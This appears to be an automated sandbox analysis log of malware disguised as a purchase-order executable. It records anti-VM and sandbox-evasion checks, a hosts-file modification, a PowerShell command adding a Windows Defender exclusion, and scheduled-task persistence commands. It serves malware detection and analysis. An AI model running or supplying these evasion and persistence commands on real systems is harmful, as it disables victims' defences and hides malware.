                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: 00000014.00000002.355635331.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.378427187.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.286211001.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Purchase order 450080088 proj. Allt Charnan.exe PID: 6588, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: jVULYR.exe PID: 7076, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: jVULYR.exe PID: 7100, type: MEMORYSTR
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.286211001.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 00000014.00000002.355635331.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 00000017.00000002.378427187.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.286211001.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 00000014.00000002.355635331.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 00000017.00000002.378427187.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe TID: 6592Thread sleep time: -45733s >= -30000s
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe TID: 6608Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7104Thread sleep time: -6456360425798339s >= -30000s
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe TID: 2376Thread sleep time: -12912720851596678s >= -30000s
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe TID: 3436Thread sleep count: 4140 > 30
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe TID: 3436Thread sleep count: 4455 > 30
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe TID: 7088Thread sleep time: -45733s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe TID: 2400Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe TID: 7016Thread sleep time: -45733s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe TID: 7036Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe TID: 872Thread sleep time: -15679732462653109s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe TID: 2920Thread sleep count: 3147 > 30
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe TID: 872Thread sleep time: -59500s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe TID: 2920Thread sleep count: 4125 > 30
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe TID: 872Thread sleep time: -52688s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe TID: 872Thread sleep time: -48376s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe TID: 872Thread sleep time: -44594s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe TID: 872Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe TID: 5660Thread sleep time: -11990383647911201s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe TID: 5664Thread sleep count: 4186 > 30
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe TID: 7104Thread sleep count: 2293 > 30
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6818
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1776
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeWindow / User API: threadDelayed 4140
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeWindow / User API: threadDelayed 4455
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeWindow / User API: threadDelayed 3147
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeWindow / User API: threadDelayed 4125
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeWindow / User API: threadDelayed 4186
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeWindow / User API: threadDelayed 2293
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeThread delayed: delay time: 45733
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeThread delayed: delay time: 45733
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeThread delayed: delay time: 45733
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeThread delayed: delay time: 30000
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeThread delayed: delay time: 922337203685477
                    Source: jVULYR.exe, 00000017.00000002.378427187.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: jVULYR.exe, 00000017.00000002.378427187.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: jVULYR.exe, 00000017.00000002.378427187.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                    Source: jVULYR.exe, 00000017.00000002.378427187.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 25_2_0634CEB0 LdrInitializeThunk,
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeMemory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    .NET source code references suspicious native API functions
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, Ej/rT.csReference to suspicious API methods: ('WJJ', 'LoadLibrary@kernel32'), ('QJy', 'GetProcAddress@kernel32')
                    Source: NpPgfycY.exe.0.dr, Ej/rT.csReference to suspicious API methods: ('WJJ', 'LoadLibrary@kernel32'), ('QJy', 'GetProcAddress@kernel32')
                    Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.b30000.0.unpack, Ej/rT.csReference to suspicious API methods: ('WJJ', 'LoadLibrary@kernel32'), ('QJy', 'GetProcAddress@kernel32')
                    Source: 0.0.Purchase order 450080088 proj. Allt Charnan.exe.b30000.0.unpack, Ej/rT.csReference to suspicious API methods: ('WJJ', 'LoadLibrary@kernel32'), ('QJy', 'GetProcAddress@kernel32')
                    Source: 8.0.Purchase order 450080088 proj. Allt Charnan.exe.2d0000.2.unpack, Ej/rT.csReference to suspicious API methods: ('WJJ', 'LoadLibrary@kernel32'), ('QJy', 'GetProcAddress@kernel32')
                    Source: 8.0.Purchase order 450080088 proj. Allt Charnan.exe.2d0000.1.unpack, Ej/rT.csReference to suspicious API methods: ('WJJ', 'LoadLibrary@kernel32'), ('QJy', 'GetProcAddress@kernel32')
                    Source: 8.0.Purchase order 450080088 proj. Allt Charnan.exe.2d0000.3.unpack, Ej/rT.csReference to suspicious API methods: ('WJJ', 'LoadLibrary@kernel32'), ('QJy', 'GetProcAddress@kernel32')
                    Source: 8.0.Purchase order 450080088 proj. Allt Charnan.exe.2d0000.0.unpack, Ej/rT.csReference to suspicious API methods: ('WJJ', 'LoadLibrary@kernel32'), ('QJy', 'GetProcAddress@kernel32')
                    Source: 8.2.Purchase order 450080088 proj. Allt Charnan.exe.2d0000.0.unpack, Ej/rT.csReference to suspicious API methods: ('WJJ', 'LoadLibrary@kernel32'), ('QJy', 'GetProcAddress@kernel32')
                    Source: jVULYR.exe.9.dr, Ej/rT.csReference to suspicious API methods: ('WJJ', 'LoadLibrary@kernel32'), ('QJy', 'GetProcAddress@kernel32')
                    Source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.4.unpack, A/E1.csReference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
                    Source: 9.2.Purchase order 450080088 proj. Allt Charnan.exe.400000.0.unpack, A/E1.csReference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
                    Modifies the hosts file
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NpPgfycY.exe
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NpPgfycY.exe
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NpPgfycY.exe
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NpPgfycY" /XML "C:\Users\user\AppData\Local\Temp\tmp86F3.tmp
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess created: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess created: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NpPgfycY" /XML "C:\Users\user\AppData\Local\Temp\tmpFBF4.tmp
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess created: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NpPgfycY" /XML "C:\Users\user\AppData\Local\Temp\tmp2B32.tmp
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess created: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
